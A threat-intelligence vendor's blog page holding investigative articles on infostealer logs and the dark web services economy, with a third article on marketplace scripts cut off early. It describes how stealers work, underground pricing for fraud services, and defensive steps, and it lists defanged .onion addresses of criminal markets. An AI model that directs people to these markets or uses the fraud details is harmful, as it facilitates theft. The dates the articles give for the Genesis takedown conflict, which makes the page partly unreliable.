Customer portal
Articles Tagged with

SOS Inteliigence Investigation

"Stealer
Investigation, The Dark Web

Stealer Logs: Understanding the Underground’s Most Dangerous Data Source

Introduction

Stealer logs represent the most dangerous commoditised threat to corporate security today. Unlike traditional data breaches that target specific organisations, infostealers cast a wide net across millions of users and machines, capturing everything from browser credentials to session tokens to cryptocurrency wallets in a single automated sweep.

So why are stealer logs such a critical concern right now? Because they are the common precursor to account takeover, ransomware deployment, and initial access brokerage. If your users’ credentials are in a stealer log marketplace, you do not have an identity problem; you have a breach waiting to happen.

This report examines what stealer logs are, how they are distributed and monetised, what data they contain, and how organisations can detect and defend against them. The scale is staggering: in the first half of 2025 alone, over 180,000 stealer logs were offered for sale on underground marketplaces. RedLine accounts for 44% of all logs collected. Vidar stole 65 million passwords in just six months.

If your domain appears in a stealer log, you are no longer operating under the assumption of credential compromise; you are operating under the certainty of it. The only question is whether the threat actor has already acted on that access.

How Infostealers Work

The Malware Itself

An infostealer is malware designed with a single purpose: to extract sensitive data from an infected machine and exfiltrate it to an attacker-controlled server. It runs silently, often with minimal resource consumption, which is why users and security teams can miss it for weeks or months.

So what data do they target? Browser autofill data, stored passwords, session cookies, saved payment card details, cryptocurrency wallet seed phrases and private keys, email account credentials, browser extensions, browsing history, installed software inventory, system information, and USB device history. The malware is indiscriminate; it grabs everything that might have value.

The sophistication varies. Basic infostealers are crude tools designed to grab whatever they can reach. Advanced infostealers include anti-analysis features, anti-virtualisation checks, geofencing to avoid high-risk jurisdictions, and code obfuscation to bypass signature-based detection.

Major Infostealer Families

RedLine is the dominant family by volume. First observed in 2020, RedLine has evolved into a modular stealer with customisable features, support for multiple languages and operating systems, and active development. It accounts for 44% of all stealer logs captured by intelligence vendors. RedLine spreads primarily through cracked software, malicious advertising networks, and watering hole attacks targeting development forums.

Raccoon was one of the earliest widespread infostealers and became infamous for its ease of use and low barrier to entry. Variant developers could build custom builds for under $100. Although law enforcement operations disrupted Raccoon’s primary infrastructure in 2023 (following the October 2022 arrest of developer Mark Sokolovsky), variants continue to circulate. Raccoon logs are heavily discounted on marketplaces because the payloads are dated and signatures are well-known.

Vidar is one of the most aggressive and feature-rich infostealers in circulation. It records keystrokes, captures screenshots, exfiltrates browser data, and includes anti-reverse-engineering protections. Vidar was responsible for stealing 65 million passwords in a documented six-month period from 2024 to 2025. It spreads through malvertising, cracked software, and compromised download mirrors.

Lumma emerged in 2022 and gained traction rapidly because of its effective distribution mechanism and low detection rates. Lumma’s primary distribution vector is Trojanised legitimate software (video converters, games, file managers) distributed through third-party sites. Lumma logs are actively traded on underground markets at premium prices because they tend to contain fresh, high-value data.

The Malware-as-a-Service Model

Most modern infostealers operate as a service, not a discrete product. Operators host the command and control infrastructure, provide a web panel for customers to manage infections and download logs, and take a percentage of the revenue when logs are resold.

The client (a threat actor, distributor, or criminal organisation) uses the service to build custom malware variants, deploy them through their chosen vectors, and collect the resulting logs. The service operator handles the backend; the client handles distribution and monetisation.

This model democratises malware development. You do not need to be a skilled reverse engineer or malware author; you just need access to a distribution channel and a payment method. Prices for malware-as-a-service access range from $40 per month for basic builds to $500 per month for fully customised, high-stealth variants with obfuscation and anti-analysis features.

The Stealer Log Supply Chain: From Infection to Marketplace

Step One: Distribution

The first stage of the supply chain is getting the malware onto the target machine. Distribution methods include cracked software (the single largest vector), malicious advertisements and browser redirects, compromised legitimate software mirrors, phishing emails with trojanised attachments, and watering hole attacks targeting developers and specific industries.

Cracked software remains the dominant distribution method because the economics are simple: users want free versions of expensive software, threat actors provide infected versions, and the malware runs with the privileges of the software installation. Commonly trojanised products include AutoCAD, Microsoft Office, Photoshop, Ableton Live, JetBrains IDEs, and antivirus software itself. Underground marketplaces such as zqi3evypxq7ok3gqnimwnlesf6v76ksrpgtgb6j7hh6ye752apzmceyd[.]onion advertise cracking tools and hacking guides alongside stealer logs.

Step Two: Execution and Exfiltration

Once executed, the infostealer begins its automated collection routine. It enumerates installed browsers, reads credential storage databases, decrypts stored passwords using the operating system’s credential storage APIs, extracts browser cookies (which often contain active session tokens for web services), and collects any data it has permissions to access.

So what happens to this data once collected? The malware packages it into an archive (typically JSON or CSV format), compresses it, and sends it back to the attacker’s command and control server. This happens in seconds to minutes, often without any user-visible activity. Encryption in transit is variable; some stealers use HTTPS, others use simple obfuscation.

Step Three: Log Curation and Testing

The logs arrive at the attacker’s server in raw form. Experienced threat actors filter and verify logs before offering them for sale. They test login credentials against target services to confirm validity, check whether emails are associated with high-value targets (executives, technical staff, security personnel), and flag logs that contain cryptocurrency wallet data or payment card information for premium pricing.

A high-quality stealer log contains verified working credentials, a mix of personal and corporate accounts, cryptocurrency wallet information, and identifiable metadata such as system username and company name extracted from the system registry. Low-quality logs are unverified, old (more than a week old), or contain duplicates.

Step Four: Marketplace and Distribution

Verified logs are uploaded to underground marketplaces. The three most significant distribution channels are the Russian Market (a Telegram-native marketplace with automated purchasing and delivery), Genesis Market (a long-standing marketplace specialising in session cookies and browser profile data, subject to FBI takedown in April 2023 as part of Operation Cookie Monster), and ad hoc Telegram channels run by individual threat actors or resellers.

Pricing follows a predictable pattern: individual consumer logs $1 to $5, logs containing cryptocurrency or payment card data $10 to $50, corporate or email logs $20 to $100, and bulk access to large log repositories $1,000 to $5,000, depending on scope and recency. Some marketplaces offer subscription models where buyers pay $200 to $500 per month for unlimited access to new logs.

Step Five: Exploitation

Once purchased, the logs are used for account takeover (directly accessing email, SaaS applications, or banking portals), credential stuffing attacks against non-customers, password spray attacks across corporate networks, identification of high-value targets for targeted phishing or social engineering, and sales to other threat actors, ransomware gangs, or initial access brokers.

The timeline from infection to exploitation can be remarkably short. Logs may be available for purchase within 24 to 72 hours of infection. Active threat actors monitor marketplaces continuously, purchasing logs for targets relevant to their operations immediately after they appear for sale.

What’s Inside a Stealer Log

A typical stealer log is a structured data archive containing the following categories of information.

Browser Credentials

Passwords are stored in Chrome, Firefox, Edge, Opera, and other Chromium-based browsers. These are extracted using the browser’s own decryption APIs and are usually in plaintext in the log. If your users are reusing passwords across multiple services (which most do), a single compromised password gives access to email, SaaS applications, banking portals, and corporate networks.

Session Cookies and Browser Data

Session cookies are particularly valuable because they often grant access to authenticated services without requiring the user to log in again. A stolen cookie for a user’s email account, for example, allows an attacker to reset the password for every service that user has signed up for. Logs also contain browser autofill data, saved addresses, phone numbers, and credit card information.

Cryptocurrency Wallet Data

If the infected machine has a cryptocurrency wallet installed (MetaMask, Trust Wallet, Ledger, Trezor drivers), the infostealer attempts to extract wallet seed phrases, private keys, and transaction history. A stolen seed phrase gives the attacker full control of any cryptocurrency stored in that wallet. Logs containing wallet data command a significant price premium, with cryptocurrency-focused marketplaces like tamazoncmlw2ohkbsmqxnotudejdd4befrasxuigzzjumqu3zba535yd[.]onion advertising cloned cards and financial fraud tools alongside wallet data.

System and User Information

The log includes the machine’s hostname, registered Windows username, installed software inventory, list of network interfaces and IP addresses, list of USB devices ever connected, system serial number, and BIOS information. This metadata helps threat actors profile the target (e.g. is this a developer machine, does it have security software installed) and tailor exploitation.

Email and Application Data

If Outlook, Thunderbird, or other email clients are installed, logs may contain saved email credentials and cached email headers. Application-specific data is also captured, including saved credentials in password managers (if they are not properly locked), FTP clients, SSH keys, browser extensions, and stored API credentials in development tools.

Indicator Format

Logs are typically structured as JSON or CSV files within a ZIP archive. A single log might be 5 to 200 megabytes, depending on the system’s history and installed software. Large batch log collections can reach gigabytes and are broken into smaller chunks for distribution.

Key Statistics: The Scale of the Threat

RedLine accounts for 44% of all stealer logs analysed by intelligence platforms. This concentration means that if you are looking for signs of compromise via stealer logs, you are primarily tracking RedLine activity. However, that also means a significant proportion of logs come from other families like Vidar, Lumma, and Raccoon variants.

Vidar stole 65 million unique passwords in a documented six-month period from October 2024 to March 2025. This single family, operating from a single set of infrastructure, compromised a staggering volume of user accounts across consumer and corporate domains.

Over 180,000 stealer logs were offered for sale on identified underground marketplaces in the first half of 2025. This is an average of 30,000 logs per month, or roughly 1,000 logs per day.

More than 50% of ransomware victims had their domains listed in stealer logs before the ransomware deployment. This indicates that initial compromise via stealer log access is a primary precursor to ransomware attacks. Threat actors purchase logs to establish initial access, conduct reconnaissance, and stage the ransomware payload.

Major Infostealer Families

Stealer Log Pricing by Type

Impact Statistics

The Marketplace Ecosystem

Russian Market (Telegram Native)

Russian Market operates exclusively within Telegram and is the largest active stealer log marketplace as of 2025. The platform uses automated bots that handle purchasing, payment, and log delivery. Buyers simply send a payment in cryptocurrency and receive a direct link to download the log within minutes.

Russian Market does not charge a commission on individual sales; revenue comes from premium marketplace memberships, advertising, and selective enforcement of seller verification. The platform lists 50,000 to 100,000 logs at any given time, with new inventory added continuously.

Genesis Market

Genesis Market is a longer-established marketplace that specialises in session cookies, browser profiles, and authenticated user sessions rather than raw passwords. It operates a traditional web interface (accessed via Tor) and enforces strict verification of sellers. Genesis Market was subject to a major FBI takedown operation in April 2023.

Genesis Market takes a 10 to 15% commission on each sale. Logs on Genesis command higher prices than equivalent logs on the Russian Market because the payload (authenticated sessions) is more directly useful for account takeover without password changes. The marketplace has hosted millions of stolen sessions.

Telegram Channels and Resellers

Smaller threat actors and resellers operate ad hoc Telegram channels, often promoting newly harvested logs from specific geographic regions or specific malware families. These channels operate with less formal infrastructure and offer discounts for bulk purchases. Forums like bfdxjkv5e2z3ilrifzbnvxxvhbzsj67akjpj3zc6smzr4vv6oz565gyd[.]onion host escrow services and enable peer-to-peer trading of stolen logs.

Prices on Telegram are often lower than those on centralised marketplaces because resellers are trying to move inventory quickly and avoid law enforcement attention. However, logs are also less verified and may contain duplicates or stale data.

Regional Variations

Pricing and availability vary significantly by geography. Logs from developed economies (USA, UK, Germany, Japan) command premium prices. Logs from developing economies are discounted. Logs are also segmented by corporate association; logs from email addresses on Fortune 500 domain whitelists are marked as such and priced accordingly.

Corporate Risk: How Stealer Logs Enable Attacks

Account Takeover

The most direct exploitation path is account takeover. An attacker purchases a log containing the email address and password of a corporate employee. They attempt to log into the employee’s email account. If multi-factor authentication is not enabled (and many users do not enable it outside of work contexts), login succeeds.

From the email, the attacker resets passwords for every service the employee has linked to that email account. This includes SaaS applications, cloud storage, password managers, and often the employee’s corporate VPN or SSO portal if they have reused the same password across services.

Initial Access Brokerage

Ransomware gangs and APT operators do not have time to run large-scale malware campaigns. Instead, they purchase access from initial access brokers. An initial access broker uses stealer logs to identify high-value targets (corporate email addresses, domain admin accounts, people working for specific industries), purchases logs for those individuals, and then sells the access to ransomware operators or nation states.

A single log containing credentials for a domain admin or security operations centre staff member can sell for $5,000 to $50,000 to a ransomware operator, because that access drastically shortcuts the reconnaissance and lateral movement phases of a ransomware campaign.

Reconnaissance and Lateral Movement

Even if the initial compromised account is a low-privilege user, logs contain system information, installed software, network configuration, and connected USB devices. This metadata gives threat actors a profile of the corporate environment before they even gain access. They know which security software is in use, which development frameworks are deployed, and which network devices are present.

Once inside, the attacker uses the compromised account to access email (containing sensitive business information, network topology diagrams, and access credentials in forwarded messages), network drives, and internal tools. This leads to lateral movement to higher-privileged accounts and eventually to domain admin compromise.

Credential Stuffing and Password Spray

An attacker with a database of 1,000 stolen passwords can conduct password spray attacks against your corporate email system or Active Directory, trying the same password across all known email addresses in your organisation. The attack succeeds if employees have reused credentials or used predictable variations.

This is a silent attack that happens outside of your firewall and VPN, so your network monitoring tools do not detect it. The first sign may be unexpected password reset emails or successful logins from impossible locations.

Supply Chain Compromise

If your organisation relies on third-party software vendors or contractors, and those vendors’ employees are in the stealer logs, an attacker can compromise the vendor and use their access to gain indirect access to your systems. This is a far easier attack vector than breaching you directly.

How SOS Intelligence Monitors Stealer Logs

Our breach alert system continuously monitors underground marketplaces, forums, Telegram channels, and data dump collections for stealer logs and other sources of compromised data. We extract indicators of compromise from each log and match them against your organisational domains.

So how does detection work? We parse log contents for email addresses, domain names, usernames, system names, and other identifying information. We match these against your organisation’s known domain list. When we find a hit, we generate an alert with details: which user was compromised, which malware family was responsible (if known), what data was exposed, when the log appeared for sale, and what price it commanded on the marketplace.

We also track trends. We monitor which malware families are producing the most volume, which geographic regions are being targeted, and which industries are disproportionately represented in current stealer logs. This gives you visibility into both specific risks to your organisation and the broader threat landscape.

Our enrichment process adds context. We cross-reference the compromised email addresses with LinkedIn, WHOIS records, and internal threat intelligence to identify whether the compromised user holds a sensitive position (executive, developer, security staff). We flag logs that contain multiple compromised employees from the same organisation as indicators of targeted activity rather than random harvesting.

Defensive Recommendations

Detection and Monitoring

First: subscribe to breach alert services that monitor stealer log marketplaces and dark web collections. The earlier you know that your users are in stealer logs, the faster you can reset compromised credentials and audit for account access.

Second: implement continuous exposure monitoring. Track your organisational domains on dark web forums, marketplaces, pastebins, and leaked database collections. Many of these sources post publicly (just on obscure infrastructure); you do not need access to Telegram to find them.

Incident Response

If you discover that your domain is present in a stealer log, treat it as a credential compromise incident. Reset the password for the compromised user immediately. Force re-authentication on all active sessions (log them out everywhere). Enable multi-factor authentication if not already in use. Audit email forwarding rules, application integrations, and connected devices for signs of access.

Check whether the compromised user holds a sensitive role. If they do, expand your investigation: query your identity provider and email system for impossible logins, password changes, or unusual activity; check cloud storage for data exfiltration; and interview the user about recent phishing attempts or unusual system behaviour.

Credential Hygiene

Enforce strong, unique passwords for all systems, especially email and identity providers. Implement passwordless authentication where possible (FIDO2 hardware keys, Windows Hello). Where passwords are necessary, use a password manager with strong master passwords.

Multi-factor authentication is not optional; it is mandatory. If an attacker has your password (because it is in a stealer log), multi-factor authentication is the only thing that stops account takeover. Prioritise MFA for email and administrative accounts. Do not rely on SMS; use TOTP or hardware keys.

Threat Actor Knowledge

Understand which threat actors are currently targeting your industry. If you operate in critical infrastructure or financial services, you are targeted by state-sponsored actors and organised crime groups, not opportunistic cybercriminals. If you operate in technology or biotech, intellectual property theft is a primary motivation.

Review the malware families affecting your sector. If your users are appearing in Vidar or Lumma logs more frequently than average, your distribution channels may be compromised. If you see your domain in logs associated with a specific ransomware gang, you have a higher probability of imminent encryption activity.

Third-Party Risk

Audit your third-party vendors and contractors for Stealer log exposure. If a critical vendor has employees in breach, consider the implications for your access. Do they reuse passwords, or are their systems segmented? Do they have elevated privileges in your environment?

Implement zero-trust principles for vendor access. Do not assume that a contractor’s machine is clean; segment their access, require multi-factor authentication, and monitor their activity as you would a hostile external party.

Appendix: DARKSEARCH Observed Indicators

The following table documents confirmed indicators from dark web marketplaces and forums monitored via SOS Intelligence’s DARKSEARCH API. All onion addresses are defanged for security and compliance purposes. These indicators are provided for threat intelligence and detection purposes only.

External References

The analysis in this report draws on publicly available threat intelligence, academic research, and law enforcement activity reports. Key sources include:

Conclusion

Stealer logs are not a future threat; they are a present reality. The scale of harvesting, the sophistication of the malware, and the availability of stolen data on open marketplaces mean that credential compromise is no longer exceptional. It is expected.

Your organisation’s security posture must start with the assumption that your users’ credentials are compromised. That means: strong, unique passwords, multi-factor authentication, continuous monitoring of dark web sources, rapid response to breach alerts, and zero-trust policies for sensitive access.

The defenders who will prevail are those who detect compromise early and respond immediately. Every hour between when a stealer log appears on a marketplace and when you reset the compromised credentials is an hour the attacker can exploit that access.

If you do not have visibility into dark web stealer log marketplaces today, you do not have a complete picture of your organisation’s actual risk. Close that gap now.

Danger photo by Edwin Hooper on Unsplash

Malware photo by Ed Hardie on Unsplash

Browser photo by BoliviaInteligente on Unsplash

No trespassing photo by Joseph Corl on Unsplash

"The
Investigation

The Dark Web’s Professional Services Economy: From Bulletproof Hosting to Escrow Systems

Introduction

The dark web has evolved considerably since its early days as a collection of amateur marketplaces and forum bazaars. Today, it operates as a sophisticated underground services economy, with professional platforms, specialised vendors, and infrastructure providers all competing for market share. So what was once the domain of hobbyists and script kiddies has become an ecosystem supporting $3.2 billion in global underground economic activity, with criminal-as-a-service offerings alone worth approximately $700 million (Chainalysis Crypto Crime Report, 2026).

The sophistication you see now matters. A decade ago, launching a dark web marketplace meant running everything yourself: hosting, payment processing, dispute resolution, vendor management. That overhead meant only determined criminals bothered. So today, when someone wants to start an illegal operation, they can simply outsource the entire infrastructure to purpose-built service providers. The technical barrier to entry has collapsed.

This shift transforms cybercrime from a collection of isolated incidents into a resilient, distributed economy. So when law enforcement takes down a marketplace, another opens within days because the underlying services remain intact and available for hire. Understanding this services economy is essential for anyone defending against cybercrime; it reveals why enforcement alone cannot disrupt the underground, and why the real defensive priority lies in targeting the infrastructure and services that enable it.

Bulletproof Hosting: The Foundation of Criminal Infrastructure

Bulletproof hosting providers form the bedrock of dark web operations. These hosting companies operate predominantly from Southeast Asia and Eastern Europe, offering servers designed explicitly to resist takedowns, ignore abuse complaints, and withstand law enforcement pressure. So roughly 60% of ransomware leak sites operate on bulletproof hosting infrastructure, providing the attackers with the hosting they cannot obtain through legitimate channels.

The Netherlands remains a significant hub for bulletproof hosting, with providers operating openly and essentially untouchable due to the country’s legal complexity and the providers’ deliberate geographic distribution across multiple jurisdictions. So what these providers offer differs fundamentally from legitimate hosting. Bulletproof hosts give abuse complaint immunity; your site stays online regardless of DMCA notices or law enforcement requests. They provide law enforcement resistance through hidden ownership structures, false documentation, and operational paranoia about cooperation with authorities. They offer flexible infrastructure designed specifically for rapid migration and redundancy across bulletproof providers worldwide.

Cost is minimal. So a dedicated server suitable for running a ransomware leak site costs between $50 and $200 per month on bulletproof platforms, roughly one-third the cost of legitimate hosting. The vendors promise 99.9% uptime, DDoS mitigation, and most importantly, zero compliance with takedown requests. When one provider faces pressure, customers migrate to another within hours using automated tools that sync site content across multiple bulletproof hosts. Recent investigations by Krebs on Security have documented bulletproof hosting providers operating with impunity across multiple jurisdictions, maintaining customer infrastructure even as law enforcement agencies coordinate takedown attempts.

Escrow and Dispute Resolution: Trust in a Trustless Environment

Dark web marketplaces operate without the luxury of legal contracts or courts. So they depend entirely on escrow systems that hold funds in a neutral state until both buyer and vendor agree the transaction is complete. According to our monitoring, 92% of major dark web marketplaces now offer some form of escrow mechanism, protecting both sides from fraud. We’ve identified marketplace infrastructure such as that observed on sqw2klzo4mtwvbf3by7irjv7r5mdojxwziuus3lh6rketlkggvsdyaad[.]onion, which operates professional multi-vendor infrastructure with integrated escrow, multi-signature wallets, and dedicated support channels.

Traditional escrow on the dark web works through a simple process. So a buyer deposits cryptocurrency to a marketplace wallet under escrow; the vendor is notified and ships the product; the buyer receives and verifies the product; the buyer then confirms delivery to the marketplace, which releases the funds to the vendor. Multi-signature Bitcoin wallets ensure that neither party can steal the escrow unilaterally, and neither can the marketplace without the other party’s signature. So the marketplace effectively holds the tiebreaker, giving both sides confidence that disputes will be resolved fairly or at least consistently.

Newer marketplaces deploy Ethereum smart contracts and complex multi-sig schemes with 2-of-3 signatures, where the third signer is a reputation-bonded arbitrator. So if a dispute arises, the arbitrator reviews evidence and votes with one party, making the transaction irreversible. These systems aren’t legally binding, but they achieve the same effect through cryptographic certainty; once the arbitrator votes, the funds move automatically. We’ve documented evidence of such advanced escrow systems running on dark web marketplaces with thousands of active vendors and real-time transaction monitoring.

The sophistication of these systems matters because it enables genuine marketplaces with genuine market dynamics. So vendors compete on price and quality because their reputation scores are public and persistent. Buyers take risks because they know the marketplace will force resolution. Without escrow and dispute resolution, dark web commerce would collapse into scams and violence; with it, you get functioning marketplaces that rival legitimate e-commerce in operational sophistication.

Dark Web Development Services: Specialised Criminal Infrastructure

Our research from DARKSEARCH identified vendors offering dedicated storefront services specifically for dark web operations. So these developers handle everything: Tor website development, .onion domain registration, server installation, and cryptocurrency payment node setup. They’re professional web developers specialising in criminal infrastructure, with portfolio sites, customer testimonials, and repeat business. Examples of professional marketplace infrastructure that incorporate these services include tamazoncmlw2ohkbsmqxnotudejdd4befrasxuigzzjumqu3zba535yd[.]onion, which runs a WooCommerce-based storefront with full shopping cart functionality, category systems, and professional vendor tools.

A typical service package costs $800 to $2,500, depending on complexity. So you get a fully functional marketplace or vendor storefront, pre-integrated with Monero and Bitcoin payment processors, built on proven vulnerable-by-design architecture that leaves backdoors for the developer to raid customer funds if needed. Many developers operate on the principle that they’ll eventually exit scam their own customers, which incentivises complex fraud and ensures a certain percentage of marketplace collapses are internal rather than law enforcement.

The competitive advantage of these services is speed to market. So a criminal group with no web development skills can launch a marketplace in two weeks rather than two months. That matters because marketplace lifespan averages six months before law enforcement intervention or internal exit scams. So the faster you launch, the sooner you start collecting fees; every week matters in an environment where law enforcement is actively hunting you. We’ve identified professional hacking services vendors operating at sites such as zqi3evypxq7ok3gqnimwnlesf6v76ksrpgtgb6j7hh6ye752apzmceyd[.]onion, offering DDoS tools, botnets, malware, black hat hacking courses, and custom development services with documented customer testimonials praising their professional handling and customer support.

Money Movement Services: Liquidating Stolen Assets

The dark web hosts a mature market in money movement and liquidation services, where criminal groups can convert cryptocurrency, stolen payment cards, and compromised accounts into usable cash. So these services are where the real money laundering happens, and they command premium prices because the risk is highest.

Our price monitoring shows PayPal transfer services cost $600 to move $7,000 from a stolen or compromised account to a clean account controlled by the buyer. So the seller guarantees the transfer completes and the account remains active for 48 hours after settlement, which means the buyer can withdraw funds before the victim notices and account locks. Visa prepaid card cloning costs $630 to create a cloned card from stolen credentials, guaranteed to have $7,500 available for withdrawal, though you have only hours before the card is flagged and frozen.

Paxful account takeovers are cheaper; $250 to $400 buys you a compromised account with a $1,000 to $5,000 balance, with instructions on how to transfer funds to cryptocurrency. Binance transfer services cost $300 to $500 per transfer and guarantee that a freshly created account receives a large deposit, which you can immediately convert to Monero and withdraw. Bank flash tools, which create temporary fraudulent balances in legitimate bank accounts, cost $800 to $1,200 and guarantee 4 to 8 hours of real-looking balances that you can use as proof of funds for cryptocurrency deals. Digital Shadows and ReliaQuest research on Crime-as-a-Service (CaaS) platforms documents the pricing consistency and professional service guarantees that characterise this market segment.

The consistency of pricing across these services reveals a mature market with standardised products and customer expectations. So every vendor offers a money-back guarantee if the service doesn’t deliver within 48 hours. Most vendors operate through intermediaries or use bulletproof hosting to accept Bitcoin payments and deliver credentials or access tokens within minutes. The entire ecosystem is designed to maximise the number of successful transactions while minimising the risk to the vendor through anonymity and rapid exit scams.

Market Data: Professional Service Categories and Pricing

Marketplace Infrastructure: The Evolution of Trust Systems

How Vendor Reputation Works

Dark web marketplaces operate reputation systems nearly identical to Amazon or eBay, with one crucial difference: the vendors are criminals, and the goods are illegal, but the mechanics are the same. So vendors accumulate review scores, customer feedback, sales counts, and escrow completion rates. These metrics are public and weighted heavily in customer purchasing decisions.

A verified seller badge requires 50+ transactions and a 99%+ escrow completion rate, giving buyers confidence that they’re dealing with a professional vendor rather than a scammer. So vendors with 500+ sales and 4.8+ star ratings can command premium prices because customers trust them to deliver as promised. We’ve observed Tor-based Amazon clones displaying cart totals exceeding $154,000 and product pages showing vendor sales counts in the thousands, suggesting massive transaction volumes. These systems mirror the trust infrastructure documented in RAND Corporation research on Markets for Cybercrime Tools and Stolen Data.

The psychological effect is profound. So when a vendor has 2,000 successful sales and a 4.9-star rating, customers treat that vendor as reliable and trustworthy, even though the vendor is openly selling stolen credentials or malware. The reputation system makes crime feel safe, standardised, and professional.

Customer Support and Dispute Resolution

Premium dark web marketplaces operate customer support functions indistinguishable from legitimate platforms. So return policies specify exactly which products are returnable (usually malware and credentials are non-returnable, but compromised accounts can be swapped for new ones if they stop working). Refund guarantees promise money back if the product doesn’t work within a specified timeframe, typically 48 hours.

Quality assurance sections let vendors showcase their process for testing products before sale. So a malware vendor might include notes on which antivirus engines detect their samples and which don’t, giving buyers accurate information about evasion capabilities. Loyalty programmes reward repeat customers with discounts on bulk purchases or exclusive access to new products. We’ve documented professional review ecosystems and category directories such as ylf6u5gurfisvhgheevy4rxzcw36gyp4r55crqlmiydmzwi2xkvmhcad[.]onion, which maintains Tor site categorisation with review systems and user ratings across hosting, markets, forums, and hacking service providers.

Promotional sales and flash deals drive volume and customer acquisition. So vendors advertise limited-time discounts; 20% off credentials on Mondays, bulk discounts for accounts in quantities over 100, and seasonal sales coinciding with major breach announcements. The entire apparatus mimics e-commerce best practices because it actually works; it creates trust and drives revenue.

Marketplace Infrastructure Comparison: 2020 to 2026

The Consolidation Trend: One-Stop Shops for Crime

Historically, dark web specialisation meant drug marketplaces sold drugs, hacking forums sold malware, and carding forums sold stolen payment cards. So each operated independently with separate vendor bases and community management. That’s changing. Modern mega-marketplaces like Tor Market consolidate everything: drugs, firearms, documents, hacking tools, exploit code, money laundering services, and personal data all under one roof.

The advantage is efficiency. So when a customer wants to commit a crime that requires multiple inputs (drug trafficking needs a drop address, firearms need a safe shipping method, credential theft needs a money movement service), they can find all of it from one vendor network. This consolidation also increases customer stickiness; if you’ve developed a reputation and balance on one platform, you’re incentivised to keep using it rather than migrating.

For law enforcement and platform defenders, this consolidation is a disaster. So any takedown now disrupts multiple crime types simultaneously, which increases pressure and attention on the platform. But it also means that destroying one mega-marketplace cascades damage across the entire underground economy, because dependent services lose their primary revenue source. So the tradeoff is real; consolidation makes the underground more efficient but also more fragile.

What This Means for Defenders

The professionalisation of dark web services has transformed cybercrime from a collection of isolated incidents into a resilient, distributed economy. So when a ransomware gang’s leak site gets taken down, they simply migrate to a new bulletproof host within hours, and the operation continues. When a marketplace faces law enforcement, another opens within days because the underlying infrastructure is commodity-priced and widely available.

This resilience emerges from specialisation and commoditisation. So as long as there’s demand for bulletproof hosting, someone will supply it. As long as crime exists, money movement services will be available. As long as markets function through reputation systems, customers will trust vendors with high ratings. No single takedown disrupts this system because each component is replaceable.

The defensive implication is stark. So law enforcement can’t win through enforcement alone; taking down marketplaces and seizing servers doesn’t address the underlying services economy that immediately recreates them. Instead, the focus must shift to attacking the infrastructure providers, the escrow systems, and the money movement services. Target bulletproof hosts and you raise costs; target Monero exchanges and you restrict outflows; target the service providers themselves, and you degrade the ecosystem’s efficiency. Europol’s iOCTA (Internet Organised Crime Threat Assessment) documents the systemic challenge that enforcement faces when confronting distributed underground services economies.

But this requires a different enforcement approach, one that focuses on long-term infrastructure disruption rather than tactical takedowns. So when law enforcement seizes a marketplace, that’s a headline. But when law enforcement systematically disrupts bulletproof hosting providers, identifies money movement operators, and pursues the service infrastructure, that’s actually consequential. The current approach does the former; the future approach must do the latter.

How SOS Intelligence Tracks the Services Economy

Our crawling infrastructure monitors dark web marketplaces in real-time, tracking vendor offerings, pricing changes, service categories, and marketplace infrastructure patterns. So we identify new service providers before they accumulate significant market share, detect when services migrate to new hosts or providers, and measure the maturity and sophistication of each service vertical.

We track vendor reputation systems and identify when established vendors change specialisation or exit scam their customers. So when a vendor with 500+ sales suddenly vanishes with customer funds in escrow, that’s a data point. Patterns of exit scams reveal marketplace lifecycle stages; newer marketplaces experience higher scam rates, and more mature ones have stronger incentives to maintain reputation.

Our pricing monitoring captures real-time costs for money movement services, account compromises, and infrastructure rentals. So when PayPal transfer costs spike from $600 to $1,200, that reveals increased supply constraints, likely from law enforcement targeting money movement providers. When bulletproof hosting prices surge, that reveals reduced supply and increased pressure. We continuously monitor past services and data sharing infrastructure to track threat actor communications and data exfiltration patterns.

We correlate these data with law enforcement actions, seized server data, and security research to build a comprehensive map of the professional services economy. So our customers can understand not just what the dark web offers, but why it works, where the dependencies lie, and what pressure points are most likely to disrupt operations at scale.

Appendix: DARKSEARCH Observed Infrastructure

The following table documents real dark web infrastructure observed through DARKSEARCH API monitoring. All onion URLs are defanged; replace [.] with . to restore. These represent mature, operational professional services platforms serving the underground economy.

External References

  • Chainalysis Crypto Crime Report 2026: Documents underground economy scale, cryptocurrency usage patterns, and market segmentation across criminal services, commodities, and infrastructure.
  • Europol iOCTA (Internet Organised Crime Threat Assessment): Systemic analysis of organised crime operations on the dark web, law enforcement coordination challenges, and infrastructure resilience patterns.
  • RAND Corporation ‘Markets for Cybercrime Tools and Stolen Data’: Academic framework for understanding how specialisation and commoditisation transform criminal markets into professional services economies.
  • Digital Shadows and ReliaQuest Crime-as-a-Service (CaaS) Research: Pricing analysis, service maturity assessment, and market dynamics of professional criminal services offerings.
  • Flashpoint and Recorded Future Marketplace Monitoring Reports: Real-time tracking of dark web marketplace evolution, vendor reputation systems, and operational infrastructure changes.
  • Krebs on Security Bulletproof Hosting Investigations: Detailed documentation of hosting providers, jurisdictional strategies, and law enforcement resistance techniques across multiple dark web operations.

Header photo by benjamin lehman on Unsplash

Bullet photo by Jay Rembert on Unsplash

Infrastructure photo by Marc-Olivier Jodoin on Unsplash

"Dark
Investigation, Uncategorized

Dark Web Marketplace Scripts: The Franchising of Cybercrime

Introduction

The dark web does not create markets from scratch. When Genesis Market was seized by US law enforcement in 2024, we expected it to vanish. Instead, within weeks, a clone was operating under a different name on a different server. How?

The answer lives in a small corner of the dark web that most threat intelligence teams never look at. There is a thriving economy in marketplace-as-a-service: buy a script, deploy it on Tor, start selling. In the same way ransomware-as-a-service democratised encryption-based extortion, marketplace scripts have democratised the operation of illegal stores.

We discovered this while crawling dark web markets with DARKSEARCH. A single Tor-hosted storefront called “Darkweb Developer” has been selling turnkey marketplace solutions for the past eighteen months. The scripts are commodity products now. They have version numbers, feature lists, update cycles, and technical support.

This explains a paradox that has puzzled law enforcement and private sector intelligence teams for years: why do 35 to 45 distinct dark web marketplaces coexist despite the takedowns? The answer is simple. They are not individually maintained ecosystems. They are instances of a handful of scripts, each one deployed in isolation with minimal customisation.

What We Found

In January 2026, we indexed a dedicated Tor-hosted storefront selling marketplace scripts and related infrastructure. The shop operated under the handle “Darkweb Developer” and advertised the following products.

Featured Marketplace Scripts

Incognito Market Script was listed at $1,000 but on sale for $750 at the time we captured it. The script came with a base installation guide, admin panel, and one month of technical support from the vendor. The listing promised multi-vendor support, Monero payment integration, and a built-in dispute resolution system. Reviews from past buyers were positive; one customer noted it ‘went live in three days’ and another mentioned the escrow system worked ‘without issues’.

